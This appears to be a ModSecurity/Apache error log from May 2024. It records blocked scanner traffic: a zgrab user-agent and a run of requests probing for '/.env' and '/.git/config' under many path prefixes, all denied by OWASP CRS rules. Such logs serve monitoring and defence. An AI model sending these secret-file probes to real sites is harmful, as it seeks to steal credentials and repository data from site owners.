[Wed May 22 15:16:20.061920 2024] [:error] [pid 3395357] [client 171.67.70.233:50208] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk3wJCC0SfZuqf1hbVzvHgAAAAA"]
[Wed May 22 15:16:20.062962 2024] [:error] [pid 3395357] [client 171.67.70.233:50208] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk3wJCC0SfZuqf1hbVzvHgAAAAA"]
[Wed May 22 15:16:20.063459 2024] [:error] [pid 3395357] [client 171.67.70.233:50208] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk3wJCC0SfZuqf1hbVzvHgAAAAA"]
[Wed May 22 19:01:16.153184 2024] [:error] [pid 3395395] [client 103.102.228.23:45064] [client 103.102.228.23] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk4k3AYtOgQFTVNZreu5zAAAAAk"]
[Wed May 22 19:01:16.154061 2024] [:error] [pid 3395395] [client 103.102.228.23:45064] [client 103.102.228.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk4k3AYtOgQFTVNZreu5zAAAAAk"]
[Wed May 22 19:01:16.154521 2024] [:error] [pid 3395395] [client 103.102.228.23:45064] [client 103.102.228.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk4k3AYtOgQFTVNZreu5zAAAAAk"]
[Wed May 22 19:16:58.754025 2024] [:error] [pid 3395358] [client 171.67.70.238:44342] [client 171.67.70.238] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk4oisLR5UJ49OezHSs-OAAAAAE"]
[Wed May 22 19:16:58.755074 2024] [:error] [pid 3395358] [client 171.67.70.238:44342] [client 171.67.70.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk4oisLR5UJ49OezHSs-OAAAAAE"]
[Wed May 22 19:16:58.755561 2024] [:error] [pid 3395358] [client 171.67.70.238:44342] [client 171.67.70.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk4oisLR5UJ49OezHSs-OAAAAAE"]
[Wed May 22 21:27:26.675656 2024] [:error] [pid 3395359] [client 18.201.192.90:46188] [client 18.201.192.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk5HHpTMfOoR75vS6_DpaAAAAAI"]
[Wed May 22 21:27:26.676379 2024] [:error] [pid 3395359] [client 18.201.192.90:46188] [client 18.201.192.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk5HHpTMfOoR75vS6_DpaAAAAAI"]
[Wed May 22 21:27:26.676847 2024] [:error] [pid 3395359] [client 18.201.192.90:46188] [client 18.201.192.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk5HHpTMfOoR75vS6_DpaAAAAAI"]
[Thu May 23 03:45:20.098858 2024] [:error] [pid 3413215] [client 147.45.48.78:44872] [client 147.45.48.78] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk6fsMTZAE7eF0447XNsjAAAAAU"]
[Thu May 23 03:45:20.099494 2024] [:error] [pid 3413215] [client 147.45.48.78:44872] [client 147.45.48.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk6fsMTZAE7eF0447XNsjAAAAAU"]
[Thu May 23 03:45:20.099927 2024] [:error] [pid 3413215] [client 147.45.48.78:44872] [client 147.45.48.78] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk6fsMTZAE7eF0447XNsjAAAAAU"]
[Thu May 23 21:50:57.449360 2024] [:error] [pid 3413211] [client 104.234.204.32:45224] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /a/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kAAAAAE"]
[Thu May 23 21:50:57.449851 2024] [:error] [pid 3413433] [client 104.234.204.32:45218] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQAAAAAY"]
[Thu May 23 21:50:57.450062 2024] [:error] [pid 3413211] [client 104.234.204.32:45224] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kAAAAAE"]
[Thu May 23 21:50:57.450400 2024] [:error] [pid 3413433] [client 104.234.204.32:45218] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQAAAAAY"]
[Thu May 23 21:50:57.450464 2024] [:error] [pid 3413211] [client 104.234.204.32:45224] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kAAAAAE"]
[Thu May 23 21:50:57.450825 2024] [:error] [pid 3413433] [client 104.234.204.32:45218] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQAAAAAY"]
[Thu May 23 21:50:57.488216 2024] [:error] [pid 3413214] [client 104.234.204.32:45238] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UEwAAAAQ"]
[Thu May 23 21:50:57.488905 2024] [:error] [pid 3413214] [client 104.234.204.32:45238] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UEwAAAAQ"]
[Thu May 23 21:50:57.489322 2024] [:error] [pid 3413214] [client 104.234.204.32:45238] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UEwAAAAQ"]
[Thu May 23 21:50:57.495056 2024] [:error] [pid 3414898] [client 104.234.204.32:45254] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /back/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqQAAAAg"]
[Thu May 23 21:50:57.495537 2024] [:error] [pid 3414898] [client 104.234.204.32:45254] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqQAAAAg"]
[Thu May 23 21:50:57.495914 2024] [:error] [pid 3414898] [client 104.234.204.32:45254] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqQAAAAg"]
[Thu May 23 21:50:57.504426 2024] [:error] [pid 3413212] [client 104.234.204.32:45258] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDAAAAAI"]
[Thu May 23 21:50:57.504656 2024] [:error] [pid 3413212] [client 104.234.204.32:45258] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDAAAAAI"]
[Thu May 23 21:50:57.504838 2024] [:error] [pid 3413212] [client 104.234.204.32:45258] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDAAAAAI"]
[Thu May 23 21:50:57.515849 2024] [:error] [pid 3413215] [client 104.234.204.32:45266] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backup/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuAAAAAU"]
[Thu May 23 21:50:57.516012 2024] [:error] [pid 3413215] [client 104.234.204.32:45266] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuAAAAAU"]
[Thu May 23 21:50:57.516154 2024] [:error] [pid 3413215] [client 104.234.204.32:45266] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuAAAAAU"]
[Thu May 23 21:50:57.526796 2024] [:error] [pid 3414863] [client 104.234.204.32:45276] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /beta/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTqwAAAAc"]
[Thu May 23 21:50:57.527342 2024] [:error] [pid 3414863] [client 104.234.204.32:45276] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTqwAAAAc"]
[Thu May 23 21:50:57.527735 2024] [:error] [pid 3414863] [client 104.234.204.32:45276] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTqwAAAAc"]
[Thu May 23 21:50:57.554441 2024] [:error] [pid 3413210] [client 104.234.204.32:45292] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "Zk-eIWikoYj9w0kALAhtQwAAAAA"]
[Thu May 23 21:50:57.554967 2024] [:error] [pid 3413210] [client 104.234.204.32:45292] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "Zk-eIWikoYj9w0kALAhtQwAAAAA"]
[Thu May 23 21:50:57.555362 2024] [:error] [pid 3413210] [client 104.234.204.32:45292] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "Zk-eIWikoYj9w0kALAhtQwAAAAA"]
[Thu May 23 21:50:57.687662 2024] [:error] [pid 3413433] [client 104.234.204.32:45320] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQQAAAAY"]
[Thu May 23 21:50:57.687697 2024] [authz_core:error] [pid 3413211] [client 104.234.204.32:45304] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/bin/.git
